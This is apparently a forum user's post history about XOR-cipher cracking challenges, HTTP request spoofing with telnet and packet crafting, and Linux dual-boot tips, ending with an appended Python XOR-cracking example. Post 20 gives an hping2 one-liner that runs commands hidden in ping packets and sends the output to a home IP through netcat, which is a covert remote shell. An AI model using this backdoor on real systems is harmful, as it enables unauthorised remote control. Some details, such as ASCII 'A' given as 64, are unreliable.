xisto Community

qwijibow

Members
  • Content Count

    1,359

Everything posted by qwijibow

  1. There is no one answer, except whichever way suits you best. Some like binary methods like RPM, slackware-packages, APT-GET, Yum, Ports, Debian packages. Some like to compile from source, with tools like ports, or portage emerge. And some like to just compile from source manually. It all depends on your personal preference, and distribution.
  2. Xoring a full byte is just like Xoring a bit 8 times. The ASCII code for A is 64, B is 65. http://forums.xisto.com/no_longer_exists/

     so
     'A' = 01000000
     'B' = 01000001
     'A' Xor 'B' = 00000001

     or 1 in base 10 decimal. A non human readable ASCII code, but you don't need to know that.

     If you look up the function for Xoring in my encryption program, you will see it is

     char Xor(char char1, char char2) { return char1 ^ char2;}

     All you need to know about Xor is that it works the same forward and backwards, but I mentioned that in the first post..

     Data Xor Password = encrypted data.
     encrypted data Xor Password = Data.

     lol, a little over confident in your abilities,, hehe. Did you ever get Visual Basic installed and have a go ??? If so, how did you attempt to crack the encryption ? How far did you get ?
  3. Naa, I probably just didn't explain it too well.

     The theory is this: take the html web page as a binary file, a long string of ASCII codes. Each of those ASCII codes has been manipulated to make it unreadable. In this type of encryption, Xor logic is used to manipulate each bit. Xor is the equivalent of (A or and (not (A and C)) see the first post for an Xor table.

     So, example... if the password was "S M I L E", each top line character is Xored to the character below it

     T H I S - I S - S O M E T H I N G - T O - E N C R Y P T
     S M I L E S M I L E S M I L E S M I L E S M I L E S M I

     and the result is the encrypted file.

     To de-crypt it, we need to find out the password. One method would be a blind brute force: systematically try out every possible password until one is found that correctly de-crypts the file. This is slow, but easy.. it would probably work with this example as the data is so small, and password so weak... but it's not a very intelligent method.

     We need to optimise the hack, and fortunately have a major advantage: there are 256 values in a byte, a byte can encode the numbers -128 to 127. And only approximately 60ish of those characters are human readable: A-Z a-z 0-9 and all the symbols like !"£$%^&*()_+~

     One method to hack the encryption would be as follows... Assuming the password is 5 characters long...

     1) Make a list of all human readable characters
     2) Exclude from the list all those characters which, when Xored to the encrypted file's 1st byte, do not produce a human readable character.
     3) Move forward 5 bytes in the encrypted file
     4) Perform step 2
     5) Goto step 3, until end of file.

     The list of human readable characters is now a list of all possible 1st password characters. Perform the above step for each of the 5 characters in the 5 character password.

     The above method will work on any encrypted plain text file. This is the method I used.

     Because we know the file is html, we can further optimise the hack. We know that there will be a "</html>" or "</HTML>" very close to the end of the file. Perhaps a faster method of cracking this encryption would be to start at the end of the file, and making a list of 7 characters which are all human readable, and can be applied to the last 7 bytes of the file, which when xored will produce one of the above html tags.

     In other words, if you Xor the string "</html>" to the correct address (where the encrypted html tag is) then the result will be the password (Xor works both ways, there are 3 elements: password, data and encrypted data. Xor any 2 of those elements together, then the 3rd element is output..

     So we KNOW the encrypted data.. we guess that the un-encrypted data is "</html>". That is 2 elements, the 3rd can be given with the Xor function... providing you xor the correct position within the encrypted data... Trial and error will find it, we know it's somewhere near the end. The probability is insanely low that it will find a false positive.

     Then move back into the file, so you are 1 byte from the end of file and repeat. Then move another byte in from the end of file and repeat. Keep going until a string of 7 characters, all human readable, is found.

     If the password is smaller than 7 then all the password will be revealed (probably wrapped around itself, trial and error can be used to find the password's true start and unwrap.

     If the password is larger than 7 characters, then you will need to apply the above method to find the remaining few characters. But performing this step first would have severely reduced the amount of work the first method would require.

     Basically this form of encryption is like this math problem

     LET A = 12 and B = 9
     C = A + B
     C = 21.
     so C = A + B.

     But what if you only knew C (encrypted) and you needed to know what A was, without knowing B.

     21 = ? + ?

     Mathematically, you can't work out the original values of A or B. So you need to look for patterns of expected output.

     Being a computer science student I suppose I just assumed everyone knew what Logic was and how it worked. Maybe I will release another cryptography hacking challenge, after reading this one it shouldn't be too difficult.
  4. Well... I must have made this challenge too hard. Like I said, this challenge is not about what you know, but about logical thinking and problem solving. There are many ways to hack this encryption... I have written a spoiler, and a pattern searching program. I will add them as attachments to this post. You will kick yourself when you see how easy this is !!! So if you like, take a look at the spoiler, and learn how to hack Xor encryption and impress the girls
  5. Linspire is linux. It uses a windows emulator to emulate windows. Linspire is linux, dressed up to look and feel like windows. I just don't like it, it goes against a lot of Linux's ideals and goals. That tutorial link seems a little out of date. It stresses that you must not install grub to the MBR, personally I would recommend installing grub to MBR. Are you using NTFS or FAT32 for your windows disk ??? If you are using fat32, you can resize the partition with many tools. If you are using ntfs, then it will be a little harder. I would recommend booting a rescue disk, partitioning the disk, then re-installing windows. You need 3 partitions, a windows partition, (approx 49% disk size maybe ?) a linux root partition, (maybe approximately 49% disk size) and a swap partition to be used as virtual memory, between 512megs, and 1gb) This time, when you install windowsXP you should definitely see that screen. Maybe you missed it ??? But it definitely comes up.
  6. LOL, that was probably the problem.. HTML and HTTP... they're related, both 4 letters long, and start with 'HT'. I must have been confusing them. Ohh well. At least I learned some pretty cool packet crafting techniques
  7. Hmm, strange.. it worked this time.... Were any changes made to the server ?
  8. Great, you're willing to format windows, this makes it much easier to set up dual boot. (Windows is crap at re-sizing its own partitions) When you are installing windows, there will be a section asking where to install windows. It looks like this. http://forums.xisto.com/no_longer_exists/ Use this menu to delete the partition on the disk, then create a new partition that does not use the whole disk. Decide how much space you want for windows, and how much you want for linux. For example, I have an 80 gig disk, 20 gigs to windows, 60 gigs to linux, so I create a new partition only 20 gigs in size, then format the newly created partition, and install windows to it. Then, when windows is installed, install linux. When it asks you where you want to install linux, select the un-partitioned space. Most linux distros can set up dual boot manually, if whatever distro you chose doesn't, it can easily be set up manually. What Linux distro are you going to use ?
  9. Hmmm, seems I definitely made it too easy. I wrote a c++ program that managed to look for patterns. It correctly estimated the length of the password, then produced a small list of possible passwords. Each password was run through looking for a <html> substring, and boom, as expected only one password generated that html tag, and it was the correct one. It took 10 minutes to write the brute force program in c++, and the program itself took approximately 0.01 seconds to run. But then again, I have studied basic encryption, so I suppose I had a huge advantage.. (ohh, plus I knew the password, I set the challenge up... LOL) Seems so far only 7 people have downloaded the encrypted web page, and from lack of posts, I assume no1 is still trying. I will post the solution, along with some clues later on in the week. Maybe I'm the only one who enjoys this sort of puzzle
  10. And I still consider the firefox plugin cheating :( I tried with telnet on windowsXP, same thing.
  11. LOL... it's not meant to be strong encryption. Glad to hear you have studied encryption... maybe challenge 2 will involve single padded xor encryption, with a quantum random number source. lol.
  12. In my country, it is legal to download an mp3 of a song that you already own. For example, I own a song, but I want it in mp3 format for my mp3 player. It is legal to download that song. This is exactly what I was doing using giFT on the fastTrack (kazaa network).

      It's quite common for anti-p2p companies to put fakes on the network, but one German server did more than send me a fake, it also started a DDOS attack on me !!!

      I rarely have any ports open, and it's just a normal home computer, so I didn't set my firewall or intrusion detection systems to detect denial of service attacks against me, who would want to DDOS me...

      Anyways, shortly after beginning the download, my CPU usage shot to 100% and accelerated from 1.0Ghz to 2.4Ghz. I say giFT was to blame, and ran netstat and tcpdump. Several ip addresses of the same domain were sending me SYN TCP packets on my open port. In other words, a SYN flood distributed Denial of service attack. I had to hard block this ip range in my firewall, and a few minutes later, the attack stopped.

      Has anti-p2p gone too far ???

      Did you know that in Holland recently, a tax was passed on MP3 players, especially large ones such as the iPOD. The tax depends on the size of the storage, but as reported on the news, the currently largest iPOD costs the american equivalent of $200 EXTRA !!! which goes directly to the record companies !!!!

      They make it illegal to download music,, But they make you pay for it anyway !!!! Guilty until proven innocent ! I don't steal music... but if they fined you $200 american extra for an iPOD and assume you will steal... well, that just p1sses me off. Hopefully, this guilty till proven innocent will not find its way to England.
  13. bash-2.05b$ telnet jipman.astahost.com 80
      Trying 69.50.168.69...
      Connected to jipman.astahost.com.
      Escape character is '^]'.
      get /challenge2.php
      <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>501 Method Not Implemented</TITLE></HEAD><BODY><H1>Method Not Implemented</H1>get to /challenge2.php not supported.<P>Invalid method in request get /challenge2.php HTTP/1.1<P><HR><ADDRESS>Apache/1.3.33 Server at http://forums.xisto.com/ Port 80</ADDRESS></BODY></HTML>
      Connection closed by foreign host.

      bash-2.05b$ telnet jipman.astahost.com 80
      Trying 69.50.168.69...
      Connected to jipman.astahost.com.
      Escape character is '^]'.
      get /challenge2.php html/1.1
      <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>501 Method Not Implemented</TITLE></HEAD><BODY><H1>Method Not Implemented</H1>get to /challenge2.php html/1.1 not supported.<P>Invalid method in request get /challenge2.php%20html/1.1 HTTP/1.1<P><HR><ADDRESS>Apache/1.3.33 Server at http://forums.xisto.com/ Port 80</ADDRESS></BODY></HTML>
      Connection closed by foreign host.

      It spits out the html 404, and closes the connection before I get a chance to enter the Host: or User-Agent lines. What did I do wrong there ??? Same problem with netcat

      bash-2.05b$ echo "GET /challenge2.php" | netcat jipman.astahost.com 80;
      <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /challenge2.php was not found on this server.<P><P>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.<HR><ADDRESS>Apache/1.3.33 Server at http://forums.xisto.com/ Port 80</ADDRESS></BODY></HTML>

      Kills connection before I get chance to send anything after GET. If I try to send user agent before get, then it just drops connection without any 404. Is your challenge programmed to UNIX standards ??? where a newline is denoted by a "\n" or the old DOS standards, where a newline is denoted by "\r\n" ??? Maybe I will try this challenge on windows next time I get access to it.
  14. And that number doesn't even come close to the number of firefox users. All those gentoo users out there who downloaded firefox source and compiled themselves, all those linux users who got firefox in the install CD. I wonder what the actual number of users is ???
  15. Notice from qwjiibow: Challenge completed by.... drum roll.... mastercomputers

      Hi guys, I've noticed that these web based hacking challenges are quite popular, so I've decided to release one. It's not web based, it doesn't require much prior knowledge, but should be quite hard. Actually, no, it seems hard, but in fact is very easy, depending on how many clues I give away. In fact, for those of you who really think hard about this, it may be too easy.. I don't know.

      Here is the challenge: I have encrypted a random html webpage that I have downloaded from a random web-site. It is your job to de-crypt it. The encrypted page is quite large, believe me, the larger the page, the more patterns will emerge and the easier this challenge should be.

      Here is how the encryption works, it uses Xor logic.

      0 xor 0 = 0
      0 xor 1 = 1
      1 xor 0 = 1
      1 xor 1 = 0

      10100110 << data byte
      01010011 << password byte
      11110101 << encrypted byte

      Google for Xor encryption for more information. This type of encryption was first used over 400 years ago by japanese warriors, and was broken almost 100 years ago by a mathematician with no computers, and the message was plain english, much harder to de-crypt than the structured html code.

      When you have broken the encryption, PM me, and I will add you to the wall of fame.

      RULES: any software you use to brute force the password MUST be written by yourself. Please include source code in the PM you send. I've seen this type of encryption broken with just a graph of the occurrences of each byte, so programming knowledge is not needed, but will be useful.

      HINTS: all '<' characters are normally very quickly followed by '>'. Tags such as <html> will be expected very near the top of the html file. Think of other patterns with html, and characters that should show up often. Maybe the last 6 characters will be </html> which would give at least 7 password characters (no, I made sure this tag was not at the very end... but it is very close) (plus, the password is quite weak, I've not decided on it yet, but it will probably be quite weak, less than 7 characters, who knows [ me] )

      If you look hard enough, you will find patterns of characters. The size of the patterns, and spacing between them will give valuable clues as to the size of the password.

      The file was taken from a Unix server, for those who don't know, in Unix, a newline is a \n character (ASCII code 10), in windows, a newline is both a \n and a \r, so when you have successfully de-crypted the file, viewing it in notepad will probably show the document without new-lines... don't worry, it's just windows being annoying.

      The source code of the program I used to encrypt the web page is added to this post as an attachment. You don't need it, but it may give a better understanding of how it works. This is very weak encryption.

      When compiled as the program xor.exe
      usage:
      xor input_file output_file password

      Because xor works both ways, forwards and backwards, running xor on a plain file will encrypt it. Running xor on an encrypted file will de-crypt it.

      The encrypted file you need to de-crypt is added as an attachment to this post...

      As time goes on if no one gets it, maybe I'll post some clues... or maybe I will assume that this hackers challenge is too hard, and let it fade into oblivion.. or maybe I made it too easy, lol. (this IS easy, it just looks very hard, especially when you first look at the encrypted file with notepad.)
  16. That's nothing... have a look at these consoles (just plain consoles, X is not running) http://forums.xisto.com/no_longer_exists/ http://forums.xisto.com/no_longer_exists/ http://forums.xisto.com/no_longer_exists/ Anyways, glad to hear it all worked.
  17. It drops me BEFORE I can finish telling it what I want. How do you keep the connection open ??? http protocol says you need the GET first, then any extras like HOST: User-Agent: etc etc etc. The first time I hit return, it spits out the html, then drops the connection.
  18. I've used wget almost every day.... how I wish I would have once read the man page and discovered the host spoofing !!!!! Well... I suppose I just like packet crafting too much !
  19. LOL.. I hate PHP. When I'm tinkering around with CGI, I tend to use bash scripts / java / native c++ compiled code rather than PHP.. you probably think I'm mad.. [joke]maybe we should agree on a secret code, like "Bannana Pie". If that word appears anywhere in one of your future challenges, I know it requires PHP / SQL[/joke] LOL. Ohh, and thanks for this clue, it would have killed me if I never saw the end of the challenge.. even if I couldn't do it myself
  20. How did you get through the first step with telnet ?? Ok, it's obvious that you need to pass a "User-Agent: Mozilla FireFox 7.77" and of course the "Host: jipman.astahost.com" but the server always kills off my telnet session the first time I hit return, it doesn't wait for more input. And \r\n don't seem to be interpreted as newlines by the server, they appear in 404ish server response.

      To get past that phase I had to go hardcore, and capture handshake, and http packets, modify them, then write a little script to send them, and packet sniff the result. Like jipman said, you don't need firefox to complete the first stage, so I'm counting the plugin as cheating :P So how did you do it with telnet ???

      Ohh, and thanks for this challenge... I've learned soooo much about hping2. Did you know that you use hping2 and netcat to penetrate firewalls !!! For example, you could set up hping2 to sniff icmp ping packets.. EVEN if the pings are blocked by the firewall, and disabled by the kernel,, AND spoofed the from ip address, hping2 in packet sniffer mode will still get them. You can set hping2 to sniff for icmp ping packets containing a secret key. You pipe the output of hping to /bin/bash then pipe the output of /bin/bash to netcat which will transmit the output of the command back to you.

      hping2 --listen mySecretSendCode --icmp -a Spoofed-Ip-Address | /bin/bash | netcat youHomeIP 80

      The following will run any code implanted in a ping, as long as it contains your secret code, then send the output of the command back to you, on an innocent looking tcp port 80 !

      Until today, I thought a stateful firewall dropping all unrelated, and unestablished, and new packets would protect me from a trojan. How wrong I was...
  21. Damnit... stuck on the login... this better not need SQL code injection, cos I suck at SQL as well as PHP. I've tried some good ol Bash insertion... but I'm pretty much stabbing in the dark... | head -n 20 and all that. Can't you write the answers upside down on the bottom of each page like they do in the newspapers... I NEED to know.
  22. Okay.. now I'm obsessed ! So.. the server disconnects after the first transmission. I've tried to put the whole request into a single transmission using \r and \n escape sequences, hoping they will be interpreted as a newline by the server. They are not. So I captured the 3 important packets in an http request, using ethereal. The first packet is a SYN packet, the second packet is an ACK, and the 3rd is the actual http request. I modified the 3rd packet to report firefox version 7.77, then I sent out the SYN packet, when the server responded I sent the ACK packet... THEN I transmitted my modified http packet. So as far as the server is concerned, we have just done a handshake, and sent a request... but the reply tells me I'm not invited to the party. At this point, I decided to cheat... I downloaded the firefox plugin that automatically spoofs the user agent, I set it to spoof firefox version 7.77 and I'm STILL not invited to the party... Have you managed to pass this test yourself ? I'm hoping you set it up wrong :P otherwise.. I give up.
  23. This is doing my egg in !!! Last time I played this game, I just used telnet, and fed it a special html request. But this server is being annoying, it closes the connection as soon as I enter the GET line, before I manage to pass the Host variable.. and therefore I get a 404, because it's looking on the main Xisto folder (same ip address and all that). I've tried passing the keep-alive part before I start typing out the GET, but that just kills the connection without any returned html code. I can't be bothered to re-compile firefox, so now I'm trying to make sense of hping. Agh !
  24. Excellent ! I like these types of problems... The only question is.... Should I re-program firefox to report its version as 7.77 or should I do some tcp packet crafting. Thanks for this... (although I AM supposed to be spending today teaching an artificial neural network to predict changes in the stock market) AGH ! My coursework will never be finished!
  25. So now that challenge 2 is out, what was the solution to challenge 1 ??? Will you be releasing any non php specific challenges ? I'm good at those.. spoofing browser referer addresses and such with packet crafting software... (hping2 rocks, any1 tried it ?)
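
The two approaches from the XOR challenge posts above (keeping only password characters whose output stays human readable, and XORing a guessed "</html>" near the end of the file to read off the password), as an added Python example that is not qwijibow's attached C++ program. The sample page, the password SMILE borrowed from the post's illustration, and all function names are constructed here.

```python
import string

# "Human readable" bytes: printable ASCII plus tab, newline, carriage return.
READABLE = frozenset(string.printable.encode()) - {0x0B, 0x0C}

def xor_crypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def position_candidates(ct: bytes, keylen: int, pos: int) -> set:
    """Method 1: key bytes that turn every keylen-th ciphertext byte,
    starting at pos, into a readable character."""
    column = ct[pos::keylen]
    return {k for k in READABLE if all((c ^ k) in READABLE for c in column)}

def plausible_keylens(ct: bytes, max_len: int = 8) -> list:
    """Key lengths for which every position keeps at least one candidate."""
    return [n for n in range(1, max_len + 1)
            if all(position_candidates(ct, n, p) for p in range(n))]

def crib_drag(ct: bytes, crib: bytes, keylen: int, window: int = 64) -> list:
    """Method 2: ciphertext XOR guessed plaintext = key bytes. Slide the
    crib back from the end of the file and keep (offset, key) pairs whose
    bytes agree where the key wraps and also survive method 1.
    Needs keylen <= len(crib) to fill every key position."""
    allowed = [position_candidates(ct, keylen, p) for p in range(keylen)]
    last = len(ct) - len(crib)
    hits = []
    for off in range(last, max(last - window, -1), -1):
        key = [None] * keylen
        for i, p in enumerate(crib):
            slot = (off + i) % keylen      # unwrap the wrapped password
            k = ct[off + i] ^ p
            if k not in allowed[slot] or key[slot] not in (None, k):
                break                      # unreadable or inconsistent guess
            key[slot] = k
        else:
            if None not in key:
                hits.append((off, bytes(key)))
    return hits

# Constructed sample page and password (not the challenge file).
PLAIN = (b"<html>\n<head><title>Demo page 2005</title></head>\n"
         b"<body>\n<p>This is some text to encrypt, 100% made up.</p>\n"
         b"</body>\n</html>\n")
KEY = b"SMILE"
CT = xor_crypt(PLAIN, KEY)

if __name__ == "__main__":
    print("plausible key lengths:", plausible_keylens(CT))
    for off, key in crib_drag(CT, b"</html>", 5):
        print(off, key, xor_crypt(CT, key)[:20])
```

A short sample leaves several candidates per position in method 1, which is why the crib is used to pin the key down; a larger file narrows the candidate sets, as the challenge post says.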